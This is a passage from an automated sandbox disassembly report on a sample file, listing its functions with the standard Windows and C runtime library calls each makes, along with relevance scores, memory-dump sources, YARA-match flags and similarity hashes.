Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0064D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0064D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0064D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0064D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0064D0CD

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 74cccfb182688b7ebec233e85e13002b4f60bb59c2bff93bf1e95efd2f85f15d
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: D9F05931A00204A7C724FE54E842C9EB37B9E90F14B60852EE80513386DF72A90AC6A6

Function 00642858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0064286F
GetLastError.KERNEL32(?,?,?,?,00648830,?,?,?,?,00000000,?,00000000), ref: 0064287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00642894
__CxxThrowException@8.LIBVCRUNTIME ref: 006428A2

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 54f728f78b97c9db18a6c4d934b60b3ecda679c7bb3b3cc45897a4897940fdae
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 5FF0A03460010ABBCF00EFA4CD45EEF37B9AB00701FA00615B510E21A1DB35DA089768

Function 00635A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 00635A83
__Cnd_signal.LIBCPMT ref: 00635A8F
std::_Cnd_initX.LIBCPMT ref: 00635AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00635AAB

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 48dc02fc867273c90a2535c75d0f42e8b6fbcb247f05aa9a71b40dc59d095807
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 55F0E571500700EFFBA17B70E80775A77A3AF01728F14492DF0865A9A2CF7AE81096DD

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0064257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 00642593
GetLastError.KERNEL32(?,?,?,?,?,00640DA0), ref: 006425A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006425B7
__CxxThrowException@8.LIBVCRUNTIME ref: 006425C5

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 7e52c3dc9a8488fb9b18336a43c40ede596394cbec8b03a1333a81ee94d2d5d3
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 55E0D86160021629E754B7744C13FBB369C9B00B41FD40859BD14E22C3FD95D50441B8

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 00649530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00642959: TlsAlloc.KERNEL32(?,00640DA0), ref: 0064295F

TlsAlloc.KERNEL32(?,00640DA0), ref: 00653BE6
GetLastError.KERNEL32 ref: 00653BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00653C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 00653C1C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 39f4a4fc2aa42a045ca1cea25ae4d36b78988ab54345d91836c3aab58c4c0efd
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 55E06174500312AFC300BB759C5767E32656600B43F600E2EF821D3392EE34D14D465C

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 00642794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00640DA0), ref: 0064279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00640DA0), ref: 006427AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006427C3
__CxxThrowException@8.LIBVCRUNTIME ref: 006427D1

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: e39a502f545e156120a44ed3202b07d178b9cce3e52ad65eaf9745597c82e68f
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: 9EE0867460010BABCB00FBB5DD4AEEF77BD6A00B06FB00565B501E3251EB68DB088779

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 006428EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 006428F8
GetLastError.KERNEL32 ref: 00642904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0064291A
__CxxThrowException@8.LIBVCRUNTIME ref: 00642928

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 4f50f6d12cd679df6575a001a8472d35f21b99bda9390adc129e2b2997dca104
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 00E0863460010A6BDB14BF71CC06BBB376DAB00741FA00925B815D21A2EF35D504869C

Function 006429B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00647BD8,00000000,?,?,00640DA0,?,?,?,00000000,?,00000000), ref: 006429BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 006429CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006429E0
__CxxThrowException@8.LIBVCRUNTIME ref: 006429EE

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 913795faac15090d70d321b24071e88e00e65eaaa48bb13866d6bab152759886
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: D6E0863420010A6BDB10BF71CC09BBF376DAF00B41FA00925B919E21A2EF35D51496AC

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 00642959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00640DA0), ref: 0064295F
GetLastError.KERNEL32 ref: 0064296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00642982
__CxxThrowException@8.LIBVCRUNTIME ref: 00642990

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 48046fb9ce130f58ed43442eb0ade157bbaa4efa1cb34574745fef78b1de853c
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 5EE0C230100106678714BBB99C4AABB72A96B01712FF00B2AF461E21E2EA68D40882AC

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 00662CEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMONLIBRARYCODE

Download Yara Rule

Strings

4f, xrefs: 00662CFF
4f, xrefs: 00662D7C, 00662E73

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID: 4f$4f
API String ID: 0-1369974416
Opcode ID: bf95e4150e32a6e9ea6774710a4b4db1b4b3c7664687a00a569d7bbf22ea1fa4
Instruction ID: 95840b429a24f179e8516face049151ba07bfd8c6fc0894f4ee2213414988171
Opcode Fuzzy Hash: bf95e4150e32a6e9ea6774710a4b4db1b4b3c7664687a00a569d7bbf22ea1fa4
Instruction Fuzzy Hash: 85510631E00606EBCB20DF54C8A2BAE7372FF15310F64816AD559AB3D1E3719E82C785

Function 0066B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0066B32B,?,00000050,?,?,?,?,?), ref: 0066B1AB

Strings

ACP, xrefs: 0066B0EE
OCP, xrefs: 0066B124

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 8c0df5c7a592f8d0143728a974298c1c3982d2823922cbc87464d2c4a90d7527
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: AF21A162A00105F6EB348E648D12BE7F39BEB52B51F5A9024E909D7304E732DDC1C394

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

OCP, xrefs: 0043AEBD
ACP, xrefs: 0043AE87

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00664B26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00664B72
GetFileType.KERNEL32(00000000), ref: 00664B84

Strings

H]o, xrefs: 00664BBB

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: H]o
API String ID: 3000768030-1406163642
Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction ID: 501d83cf8de07d1f09408f38b6b1909cc09f7766c91ffebd800966615b8f0c95
Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction Fuzzy Hash: DD11D6315047528AC7304E3EDC88766BA96EB96331B38072AE0B6C76F2CF30D986D644

Function 004348BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0043490B
GetFileType.KERNEL32(00000000), ref: 0043491D

Strings

H]o, xrefs: 00434954

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: FileHandleType
String ID: H]o
API String ID: 3000768030-1406163642
Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction ID: 9875bc295672454492d04964ad4796884c43b126410369cfab48893691dd09dc
Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
Instruction Fuzzy Hash: 4B11D5B550474146DB304E3E8C88763BA94AFDA334F38276BD0B6936F1C22CE9829649

Function 0065CBFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0065CC2A
_free.LIBCMT ref: 0065CC50

Strings

H]o, xrefs: 0065CC25, 0065CC32, 0065CC4B, 0065CC58, 0065CC7E

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free
String ID: H]o
API String ID: 269201875-1406163642
Opcode ID: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
Instruction ID: 3f0a9fd5b8a9358a10e67331754aa67625236b122536730fda14bb95b3a17c1e
Opcode Fuzzy Hash: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
Instruction Fuzzy Hash: 8311B671A007105FE7209B2DAC85B553AA69B80772F24023BF919CB3D2E770D98A4BC8

Function 0042C995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042C9C3
_free.LIBCMT ref: 0042C9E9
